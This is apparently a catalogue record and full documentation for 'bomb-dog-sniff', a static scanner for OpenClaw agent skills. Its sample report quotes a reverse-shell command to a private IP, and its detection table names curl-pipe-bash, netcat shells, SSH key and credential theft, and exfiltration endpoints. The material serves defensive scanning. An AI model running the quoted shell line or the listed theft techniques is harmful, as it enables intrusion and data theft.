{ "schemaVersion": "1.0", "item": { "slug": "skill-bomb-dog-sniff", "name": "Bomb Dog Sniff", "source": "tencent", "type": "skill", "category": "安å…Øåˆč§„", "sourceUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff", "canonicalUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff", "targetPlatform": "OpenClaw" }, "install": { "downloadMode": "redirect", "downloadUrl": "/downloads/skill-bomb-dog-sniff", "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-bomb-dog-sniff", "sourcePlatform": "tencent", "targetPlatform": "OpenClaw", "installMethod": "Manual import", "extraction": "Extract archive", "prerequisites": [ "OpenClaw" ], "packageFormat": "ZIP package", "includedAssets": [ ".guardianrc.example.json", "PERFECTION_SUMMARY.md", "SKILL.md", "package.json", "patterns.js", "safe-download.js" ], "primaryDoc": "SKILL.md", "quickSetup": [ "Download the package from Yavira.", "Extract the archive and review SKILL.md first.", "Import or place the package into your OpenClaw setup." ], "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run." } ] }, "sourceHealth": { "source": "tencent", "status": "healthy", "reason": "direct_download_ok", "recommendedAction": "download", "checkedAt": "2026-04-23T16:43:11.935Z", "expiresAt": "2026-04-30T16:43:11.935Z", "httpStatus": 200, "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentType": "application/zip", "probeMethod": "head", "details": { "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"", "redirectLocation": null, "bodySnippet": null }, "scope": "source", "summary": "Source download looks usable.", "detail": "Yavira can redirect you to the upstream package for this source.", "primaryActionLabel": "Download for OpenClaw", "primaryActionHref": "/downloads/skill-bomb-dog-sniff" }, "validation": { "installChecklist": [ "Use the Yavira download entry.", "Review SKILL.md after the package is downloaded.", "Confirm the extracted package contains the expected setup assets." ], "postInstallChecks": [ "Confirm the extracted package includes the expected docs or setup files.", "Validate the skill or prompts are available in your target agent workspace.", "Capture any manual follow-up steps the agent could not complete." ] }, "downloadPageUrl": "https://openagent3.xyz/downloads/skill-bomb-dog-sniff", "agentPageUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent", "manifestUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json", "briefUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md" }, "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run." } ] }, "documentation": { "source": "clawhub", "primaryDoc": "SKILL.md", "sections": [ { "title": "bomb-dog-sniff v1.2.0 šŸ•", "body": "Like a bomb-sniffing dog for OpenClaw skills\n\nSniff out malicious skills before they explode in your system. Quarantine ā†’ Scan ā†’ Install only the safe ones." }, { "title": "Security Hardening", "body": "Fixed command injection vulnerabilities in download functions\nAdded path traversal protection - Sanitizes all path inputs\nSecure quarantine - Randomized directory names with restricted permissions\nBinary file detection - Skips binary files to avoid false positives\nFile size limits - Prevents DoS via huge files\nReDoS protection - Limits regex processing on long lines" }, { "title": "Detection Improvements", "body": "Smart false positive reduction - Better context-aware pattern matching\nEntropy analysis - Detects encoded/encrypted payloads\nTest file awareness - Reduces severity for findings in test files\nConfidence scoring - Each finding has confidence level (high/medium/low)\n13 detection categories - Added supply chain, prototype pollution, and malicious script detection" }, { "title": "New Patterns", "body": "Supply chain attack indicators (typosquatting, dynamic requires)\nPrototype pollution vulnerabilities\nMalicious npm/yarn scripts\nBrowser credential theft\nSSH key theft\nSystemd persistence mechanisms" }, { "title": "Quick Start", "body": "# Sniff out threats before installing\nopenclaw skill bomb-dog-sniff scan ./downloaded-skill\n\n# Safe install from clawhub (auto-downloads, sniffs, installs if clean)\nopenclaw skill bomb-dog-sniff safe-install cool-skill\n\n# Audit an already-installed skill\nopenclaw skill bomb-dog-sniff audit bird\n\n# Batch scan multiple skills\nopenclaw skill bomb-dog-sniff batch skills-to-audit.txt" }, { "title": "scan", "body": "Scan a skill directory for malicious patterns.\n\nopenclaw skill bomb-dog-sniff scan [options]\n\nOptions:\n -j, --json Output JSON only\n -v, --verbose Show detailed findings\n -t, --threshold N Set risk threshold (default: 40)\n -h, --help Show help\n\nExample:\n\nopenclaw skill bomb-dog-sniff scan ./untrusted-skill\nopenclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json\n\nOutput:\n\nšŸ” Bomb-Dog-Sniff Security Scanner v1.2.0\nTarget: /home/user/skills/untrusted-skill\n\nšŸ”“ CRITICAL (2)\nā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€\n crypto_harvester: scripts/wallet.js:23\n Crypto wallet private key harvesting detected\n Code: const privateKey = \"a1b2c3...\"\n Confidence: high\n\n reverse_shell: scripts/backdoor.sh:5\n Reverse shell or remote code execution detected\n Code: bash -i >& /dev/tcp/192.168.1.100/4444\n Confidence: high\n\nšŸŸ  HIGH (1)\nā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€\n pipe_bash: install.sh:12\n Dangerous curl | bash pattern detected\n Confidence: high\n\nā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•\nSCAN SUMMARY\nā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•\nā˜ ļø Risk Score: 75/100\n Risk Level: MALICIOUS\n Duration: 125ms\n Files Scanned: 12/15\n Files Skipped: 3 (binary/empty/large)\n Findings: 3\n\n Severity Breakdown:\n šŸ”“ CRITICAL: 2\n šŸŸ  HIGH: 1\n\nšŸ“‹ Recommendation:\n MALICIOUS - Do not install. Found 3 critical security issues.\n\nScan ID: bds-20260208-a1b2c3d4" }, { "title": "safe-install", "body": "Download from clawhub/GitHub, scan, and install only if safe.\n\nopenclaw skill bomb-dog-sniff safe-install [options]\n\nSource:\n - ClawHub skill name: bird\n - GitHub URL: https://github.com/user/skill\n - Local path: ./local-skill\n\nOptions:\n --threshold N Set risk threshold (default: 39)\n --dry-run Scan only, don't install\n --verbose Show all findings\n\nExample:\n\n# Install with default threshold (39)\nopenclaw skill bomb-dog-sniff safe-install bird\n\n# Stricter threshold\nopenclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20\n\n# Scan only (dry run)\nopenclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run\n\n# GitHub source\nopenclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill" }, { "title": "audit", "body": "Audit an already-installed skill.\n\nopenclaw skill bomb-dog-sniff audit [options]\n\nExample:\n\nopenclaw skill bomb-dog-sniff audit notion" }, { "title": "batch", "body": "Scan multiple skills from a list file.\n\nopenclaw skill bomb-dog-sniff batch \n\nExample list file (skills.txt):\n\n# My installed skills to audit\nbird\nnotion\ngog\nslack\n./custom-skill\n\n# Commented lines are ignored\n# old-skill\n\nRun:\n\nopenclaw skill bomb-dog-sniff batch skills.txt" }, { "title": "Detection Categories", "body": "bomb-dog-sniff scans for these threat categories:\n\nCategorySeverityExamples Detectedcrypto_harvesterCRITICALPrivate key extraction, wallet exports, mnemonic theftcredential_theftCRITICALEnvironment variable exfiltration, config file theft, SSH key theftreverse_shellCRITICALNetcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote codekeyloggerCRITICALKeyboard capture with exfiltration, clipboard theft, password field monitoringencoded_payloadHIGHBase64 execution chains, hex escapes with eval context, obfuscated codesuspicious_apiHIGHPastebin/ngrok/webhook destinations, dynamic URL construction with secretspipe_bashHIGHcurl | bash, wget | sh patternsdeposit_scamHIGH\"Send ETH to 0x...\", payment prompts in unexpected contextssupply_chainHIGHTyposquatting, dynamic requires, suspicious postinstall scriptsprototype_pollutionHIGHDangerous object merging, __proto__ manipulationmalicious_scriptCRITICALPre/postinstall doing network/exec operations, modifying other packagesnetwork_exfilMEDIUMFile reading followed by network transmissionfile_tamperCRITICAL.bashrc modification, crontab editing, SSH authorized_keys manipulation" }, { "title": "Risk Scoring", "body": "0-19 SAFE āœ… Install freely\n20-39 LOW āš ļø Review recommended\n40-69 SUSPICIOUS šŸš« Blocked by default\n70-100 MALICIOUS ā˜ ļø Never install\n\nEach finding adds to the score:\n\nCRITICAL: +25 points (Ɨ confidence multiplier)\nHIGH: +15 points (Ɨ confidence multiplier)\nMEDIUM: +5 points (Ɨ confidence multiplier)\n\nConfidence multipliers:\n\nHigh confidence: 1.0Ɨ\nMedium confidence: 0.75Ɨ\nLow confidence: 0.5Ɨ\n\nScore caps at 100." }, { "title": "Safe Install Process", "body": "1. QUARANTINE\n ā””ā”€ā”€ Skill downloaded to /tmp/bds-q-/\n ā””ā”€ā”€ Randomized, non-predictable directory name\n ā””ā”€ā”€ Restricted permissions (0o700)\n \n2. SCAN\n ā”œā”€ā”€ Check all files against detection patterns\n ā”œā”€ā”€ Skip binary files, empty files, files >10MB\n ā”œā”€ā”€ Calculate entropy for encoded payload detection\n ā”œā”€ā”€ Apply confidence multipliers\n ā””ā”€ā”€ Generate findings report\n \n3. DECISION\n ā”œā”€ā”€ Risk > threshold? ā†’ BLOCK & DELETE\n ā””ā”€ā”€ Risk ā‰¤ threshold? ā†’ PROCEED\n \n4. INSTALL (if passed)\n ā””ā”€ā”€ Move from quarantine to skills directory\n ā””ā”€ā”€ Backup existing installation (max 5 backups)\n \n5. CLEANUP\n ā””ā”€ā”€ Securely remove quarantine directory" }, { "title": "Scanning Details", "body": "Static analysis only - No code execution\nMulti-pattern matching - 60+ detection patterns\nLine-level reporting - Exact file:line for each finding\nFalse positive reduction - Context-aware pattern matching\nBinary detection - Automatically skips binary files\nSymlink loop protection - Tracks visited inodes\nDepth limiting - Max 20 directory levels\nTest file handling - Reduces severity for test files" }, { "title": "Environment Variables", "body": "# Set custom skills directory\nexport OPENCLAW_SKILLS_DIR=/path/to/skills\n\n# Set default risk threshold\nexport BOMB_DOG_THRESHOLD=25" }, { "title": "Per-Skill Configuration", "body": "Add to your skill's package.json:\n\n{\n \"bomb-dog-sniff\": {\n \"riskThreshold\": 25,\n \"excludedCategories\": [\"network_exfil\"]\n }\n}" }, { "title": "CI/CD Integration", "body": "Add to your CI pipeline:\n\n# .github/workflows/skill-security.yml\nname: Skill Security Scan\n\non: [push, pull_request]\n\njobs:\n scan:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v3\n \n - name: Scan skills\n run: |\n for skill in skills/*/; do\n echo \"Scanning $skill\"\n node skills/bomb-dog-sniff/scan.js \"$skill\" || exit 1\n done\n\nExit codes:\n\n0 - Safe (score below threshold)\n1 - Error/invalid arguments\n2 - Risky (score ā‰„ threshold)" }, { "title": "Programmatic API", "body": "const { scanSkill } = require('./scan');\nconst { safeDownload } = require('./safe-download');\n\n// Scan a skill\nconst report = scanSkill('./path/to/skill', { verbose: true });\nconsole.log(`Risk score: ${report.riskScore}`);\nconsole.log(`Findings: ${report.findings.length}`);\n\n// Safe download and install\nconst result = await safeDownload('cool-skill', {\n autoInstall: true,\n riskThreshold: 30,\n});\n\nif (!result.success) {\n console.error('Installation blocked:', result.reason);\n}" }, { "title": "Security Limits", "body": "To prevent DoS and ensure scanner security:\n\nLimitValuePurposeMax file size10MBPrevent memory exhaustionMax line length10KBPrevent ReDoS attacksMax files per scan10,000Prevent resource exhaustionMax findings per file100Prevent output floodingMax total findings500Prevent result floodingMax directory depth20Prevent infinite recursionDownload timeout2 minutesPrevent hanging downloadsMax download size50MBPrevent disk exhaustion" }, { "title": "False Positives", "body": "If legitimate code triggers a warning:\n\nCheck confidence level - Low confidence findings are more likely to be false positives\nReview the excerpt - Look at the actual code flagged\nTest files are noted - Findings in *.test.js or __tests__/ have reduced severity\nComments are generally skipped - Unless they contain suspicious keywords\n\nTo report false positives, please include:\n\nThe file content that triggered the false positive\nThe pattern category that matched\nExpected behavior" }, { "title": "Best Practices", "body": "Always scan before installing unknown skills\nUse --dry-run first for untrusted sources\nSet lower threshold (--threshold 20) for critical systems\nAudit regularly - Rescan installed skills periodically\nReview CRITICAL findings - Never ignore critical severity warnings\nCheck confidence levels - High confidence = higher priority" }, { "title": "Files", "body": "SKILL.md - This documentation\nscan.js - Core scanner engine\npatterns.js - Detection pattern definitions\nsafe-download.js - Safe download & install logic\nscripts/sniff.sh - CLI wrapper\npackage.json - Package configuration\nQUICKSTART.md - Quick reference guide" }, { "title": "Security Notes", "body": "āš ļø Limitations:\n\nStatic analysis only (some obfuscation may evade detection)\nPattern-based (novel attacks may not be detected)\nNot a replacement for manual code review on critical systems\nCannot detect runtime-only malicious behavior\n\nāœ… Recommendations:\n\nUse bomb-dog-sniff as first line of defense\nReview code manually for high-security environments\nKeep patterns.js updated with new threat signatures\nReport false positives and missed detections\nCombine with other security tools for defense in depth" }, { "title": "v1.2.0 (Hardened Edition)", "body": "SECURITY: Fixed command injection vulnerabilities in safe-download.js\nSECURITY: Added path traversal protection\nSECURITY: Secure randomized quarantine directories\nFEATURE: Binary file detection and skipping\nFEATURE: File size limits (10MB per file, 50MB download)\nFEATURE: Entropy analysis for encoded payload detection\nFEATURE: Confidence scoring for all findings\nFEATURE: Test file awareness with severity reduction\nFEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)\nIMPROVEMENT: Better false positive reduction with context-aware matching\nIMPROVEMENT: ReDoS protection via line length limits\nIMPROVEMENT: Symlink loop protection\nIMPROVEMENT: Backup rotation (max 5 backups)" }, { "title": "v1.1.0", "body": "Added safe-install command with quarantine workflow\nAdded audit command for installed skills\nAdded batch command for multiple skill scanning\nEnhanced detection patterns (50+ signatures)\nAdded risk threshold configuration" }, { "title": "v1.0.0", "body": "Initial release with basic scanning\n10 detection categories\nJSON output format" }, { "title": "License", "body": "MIT - See LICENSE file\n\nStay safe. Scan everything. Trust verified skills only. šŸ¦žšŸ•" } ], "body": "bomb-dog-sniff v1.2.0 šŸ•\n\nLike a bomb-sniffing dog for OpenClaw skills\n\nSniff out malicious skills before they explode in your system. Quarantine ā†’ Scan ā†’ Install only the safe ones.\n\nWhat's New in v1.2.0\nSecurity Hardening\nFixed command injection vulnerabilities in download functions\nAdded path traversal protection - Sanitizes all path inputs\nSecure quarantine - Randomized directory names with restricted permissions\nBinary file detection - Skips binary files to avoid false positives\nFile size limits - Prevents DoS via huge files\nReDoS protection - Limits regex processing on long lines\nDetection Improvements\nSmart false positive reduction - Better context-aware pattern matching\nEntropy analysis - Detects encoded/encrypted payloads\nTest file awareness - Reduces severity for findings in test files\nConfidence scoring - Each finding has confidence level (high/medium/low)\n13 detection categories - Added supply chain, prototype pollution, and malicious script detection\nNew Patterns\nSupply chain attack indicators (typosquatting, dynamic requires)\nPrototype pollution vulnerabilities\nMalicious npm/yarn scripts\nBrowser credential theft\nSSH key theft\nSystemd persistence mechanisms\nQuick Start\n# Sniff out threats before installing\nopenclaw skill bomb-dog-sniff scan ./downloaded-skill\n\n# Safe install from clawhub (auto-downloads, sniffs, installs if clean)\nopenclaw skill bomb-dog-sniff safe-install cool-skill\n\n# Audit an already-installed skill\nopenclaw skill bomb-dog-sniff audit bird\n\n# Batch scan multiple skills\nopenclaw skill bomb-dog-sniff batch skills-to-audit.txt\n\nCommands\nscan\n\nScan a skill directory for malicious patterns.\n\nopenclaw skill bomb-dog-sniff scan [options]\n\nOptions:\n -j, --json Output JSON only\n -v, --verbose Show detailed findings\n -t, --threshold N Set risk threshold (default: 40)\n -h, --help Show help\n\n\nExample:\n\nopenclaw skill bomb-dog-sniff scan ./untrusted-skill\nopenclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json\n\n\nOutput:\n\nšŸ” Bomb-Dog-Sniff Security Scanner v1.2.0\nTarget: /home/user/skills/untrusted-skill\n\nšŸ”“ CRITICAL (2)\nā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€\n crypto_harvester: scripts/wallet.js:23\n Crypto wallet private key harvesting detected\n Code: const privateKey = \"a1b2c3...\"\n Confidence: high\n\n reverse_shell: scripts/backdoor.sh:5\n Reverse shell or remote code execution detected\n Code: bash -i >& /dev/tcp/192.168.1.100/4444\n Confidence: high\n\nšŸŸ  HIGH (1)\nā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€\n pipe_bash: install.sh:12\n Dangerous curl | bash pattern detected\n Confidence: high\n\nā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•\nSCAN SUMMARY\nā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•\nā˜ ļø Risk Score: 75/100\n Risk Level: MALICIOUS\n Duration: 125ms\n Files Scanned: 12/15\n Files Skipped: 3 (binary/empty/large)\n Findings: 3\n\n Severity Breakdown:\n šŸ”“ CRITICAL: 2\n šŸŸ  HIGH: 1\n\nšŸ“‹ Recommendation:\n MALICIOUS - Do not install. Found 3 critical security issues.\n\nScan ID: bds-20260208-a1b2c3d4\n\nsafe-install\n\nDownload from clawhub/GitHub, scan, and install only if safe.\n\nopenclaw skill bomb-dog-sniff safe-install [options]\n\nSource:\n - ClawHub skill name: bird\n - GitHub URL: https://github.com/user/skill\n - Local path: ./local-skill\n\nOptions:\n --threshold N Set risk threshold (default: 39)\n --dry-run Scan only, don't install\n --verbose Show all findings\n\n\nExample:\n\n# Install with default threshold (39)\nopenclaw skill bomb-dog-sniff safe-install bird\n\n# Stricter threshold\nopenclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20\n\n# Scan only (dry run)\nopenclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run\n\n# GitHub source\nopenclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill\n\naudit\n\nAudit an already-installed skill.\n\nopenclaw skill bomb-dog-sniff audit [options]\n\n\nExample:\n\nopenclaw skill bomb-dog-sniff audit notion\n\nbatch\n\nScan multiple skills from a list file.\n\nopenclaw skill bomb-dog-sniff batch \n\n\nExample list file (skills.txt):\n\n# My installed skills to audit\nbird\nnotion\ngog\nslack\n./custom-skill\n\n# Commented lines are ignored\n# old-skill\n\n\nRun:\n\nopenclaw skill bomb-dog-sniff batch skills.txt\n\nDetection Categories\n\nbomb-dog-sniff scans for these threat categories:\n\nCategory\tSeverity\tExamples Detected\ncrypto_harvester\tCRITICAL\tPrivate key extraction, wallet exports, mnemonic theft\ncredential_theft\tCRITICAL\tEnvironment variable exfiltration, config file theft, SSH key theft\nreverse_shell\tCRITICAL\tNetcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code\nkeylogger\tCRITICAL\tKeyboard capture with exfiltration, clipboard theft, password field monitoring\nencoded_payload\tHIGH\tBase64 execution chains, hex escapes with eval context, obfuscated code\nsuspicious_api\tHIGH\tPastebin/ngrok/webhook destinations, dynamic URL construction with secrets\npipe_bash\tHIGH\tcurl | bash, wget | sh patterns\ndeposit_scam\tHIGH\t\"Send ETH to 0x...\", payment prompts in unexpected contexts\nsupply_chain\tHIGH\tTyposquatting, dynamic requires, suspicious postinstall scripts\nprototype_pollution\tHIGH\tDangerous object merging, __proto__ manipulation\nmalicious_script\tCRITICAL\tPre/postinstall doing network/exec operations, modifying other packages\nnetwork_exfil\tMEDIUM\tFile reading followed by network transmission\nfile_tamper\tCRITICAL\t.bashrc modification, crontab editing, SSH authorized_keys manipulation\nRisk Scoring\n0-19 SAFE āœ… Install freely\n20-39 LOW āš ļø Review recommended\n40-69 SUSPICIOUS šŸš« Blocked by default\n70-100 MALICIOUS ā˜ ļø Never install\n\n\nEach finding adds to the score:\n\nCRITICAL: +25 points (Ɨ confidence multiplier)\nHIGH: +15 points (Ɨ confidence multiplier)\nMEDIUM: +5 points (Ɨ confidence multiplier)\n\nConfidence multipliers:\n\nHigh confidence: 1.0Ɨ\nMedium confidence: 0.75Ɨ\nLow confidence: 0.5Ɨ\n\nScore caps at 100.\n\nHow It Works\nSafe Install Process\n1. QUARANTINE\n ā””ā”€ā”€ Skill downloaded to /tmp/bds-q-/\n ā””ā”€ā”€ Randomized, non-predictable directory name\n ā””ā”€ā”€ Restricted permissions (0o700)\n \n2. SCAN\n ā”œā”€ā”€ Check all files against detection patterns\n ā”œā”€ā”€ Skip binary files, empty files, files >10MB\n ā”œā”€ā”€ Calculate entropy for encoded payload detection\n ā”œā”€ā”€ Apply confidence multipliers\n ā””ā”€ā”€ Generate findings report\n \n3. DECISION\n ā”œā”€ā”€ Risk > threshold? ā†’ BLOCK & DELETE\n ā””ā”€ā”€ Risk ā‰¤ threshold? ā†’ PROCEED\n \n4. INSTALL (if passed)\n ā””ā”€ā”€ Move from quarantine to skills directory\n ā””ā”€ā”€ Backup existing installation (max 5 backups)\n \n5. CLEANUP\n ā””ā”€ā”€ Securely remove quarantine directory\n\nScanning Details\nStatic analysis only - No code execution\nMulti-pattern matching - 60+ detection patterns\nLine-level reporting - Exact file:line for each finding\nFalse positive reduction - Context-aware pattern matching\nBinary detection - Automatically skips binary files\nSymlink loop protection - Tracks visited inodes\nDepth limiting - Max 20 directory levels\nTest file handling - Reduces severity for test files\nConfiguration\nEnvironment Variables\n# Set custom skills directory\nexport OPENCLAW_SKILLS_DIR=/path/to/skills\n\n# Set default risk threshold\nexport BOMB_DOG_THRESHOLD=25\n\nPer-Skill Configuration\n\nAdd to your skill's package.json:\n\n{\n \"bomb-dog-sniff\": {\n \"riskThreshold\": 25,\n \"excludedCategories\": [\"network_exfil\"]\n }\n}\n\nCI/CD Integration\n\nAdd to your CI pipeline:\n\n# .github/workflows/skill-security.yml\nname: Skill Security Scan\n\non: [push, pull_request]\n\njobs:\n scan:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v3\n \n - name: Scan skills\n run: |\n for skill in skills/*/; do\n echo \"Scanning $skill\"\n node skills/bomb-dog-sniff/scan.js \"$skill\" || exit 1\n done\n\n\nExit codes:\n\n0 - Safe (score below threshold)\n1 - Error/invalid arguments\n2 - Risky (score ā‰„ threshold)\nProgrammatic API\nconst { scanSkill } = require('./scan');\nconst { safeDownload } = require('./safe-download');\n\n// Scan a skill\nconst report = scanSkill('./path/to/skill', { verbose: true });\nconsole.log(`Risk score: ${report.riskScore}`);\nconsole.log(`Findings: ${report.findings.length}`);\n\n// Safe download and install\nconst result = await safeDownload('cool-skill', {\n autoInstall: true,\n riskThreshold: 30,\n});\n\nif (!result.success) {\n console.error('Installation blocked:', result.reason);\n}\n\nSecurity Limits\n\nTo prevent DoS and ensure scanner security:\n\nLimit\tValue\tPurpose\nMax file size\t10MB\tPrevent memory exhaustion\nMax line length\t10KB\tPrevent ReDoS attacks\nMax files per scan\t10,000\tPrevent resource exhaustion\nMax findings per file\t100\tPrevent output flooding\nMax total findings\t500\tPrevent result flooding\nMax directory depth\t20\tPrevent infinite recursion\nDownload timeout\t2 minutes\tPrevent hanging downloads\nMax download size\t50MB\tPrevent disk exhaustion\nFalse Positives\n\nIf legitimate code triggers a warning:\n\nCheck confidence level - Low confidence findings are more likely to be false positives\nReview the excerpt - Look at the actual code flagged\nTest files are noted - Findings in *.test.js or __tests__/ have reduced severity\nComments are generally skipped - Unless they contain suspicious keywords\n\nTo report false positives, please include:\n\nThe file content that triggered the false positive\nThe pattern category that matched\nExpected behavior\nBest Practices\nAlways scan before installing unknown skills\nUse --dry-run first for untrusted sources\nSet lower threshold (--threshold 20) for critical systems\nAudit regularly - Rescan installed skills periodically\nReview CRITICAL findings - Never ignore critical severity warnings\nCheck confidence levels - High confidence = higher priority\nFiles\nSKILL.md - This documentation\nscan.js - Core scanner engine\npatterns.js - Detection pattern definitions\nsafe-download.js - Safe download & install logic\nscripts/sniff.sh - CLI wrapper\npackage.json - Package configuration\nQUICKSTART.md - Quick reference guide\nSecurity Notes\n\nāš ļø Limitations:\n\nStatic analysis only (some obfuscation may evade detection)\nPattern-based (novel attacks may not be detected)\nNot a replacement for manual code review on critical systems\nCannot detect runtime-only malicious behavior\n\nāœ… Recommendations:\n\nUse bomb-dog-sniff as first line of defense\nReview code manually for high-security environments\nKeep patterns.js updated with new threat signatures\nReport false positives and missed detections\nCombine with other security tools for defense in depth\nChangelog\nv1.2.0 (Hardened Edition)\nSECURITY: Fixed command injection vulnerabilities in safe-download.js\nSECURITY: Added path traversal protection\nSECURITY: Secure randomized quarantine directories\nFEATURE: Binary file detection and skipping\nFEATURE: File size limits (10MB per file, 50MB download)\nFEATURE: Entropy analysis for encoded payload detection\nFEATURE: Confidence scoring for all findings\nFEATURE: Test file awareness with severity reduction\nFEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)\nIMPROVEMENT: Better false positive reduction with context-aware matching\nIMPROVEMENT: ReDoS protection via line length limits\nIMPROVEMENT: Symlink loop protection\nIMPROVEMENT: Backup rotation (max 5 backups)\nv1.1.0\nAdded safe-install command with quarantine workflow\nAdded audit command for installed skills\nAdded batch command for multiple skill scanning\nEnhanced detection patterns (50+ signatures)\nAdded risk threshold configuration\nv1.0.0\nInitial release with basic scanning\n10 detection categories\nJSON output format\nLicense\n\nMIT - See LICENSE file\n\nStay safe. Scan everything. Trust verified skills only. šŸ¦žšŸ•" }, "trust": { "sourceLabel": "tencent", "provenanceUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff", "publisherUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff", "owner": "LvcidPsyche", "version": "0.1.0", "license": null, "verificationStatus": "Indexed source record" }, "links": { "detailUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff", "downloadUrl": "https://openagent3.xyz/downloads/skill-bomb-dog-sniff", "agentUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent", "manifestUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json", "briefUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md" } }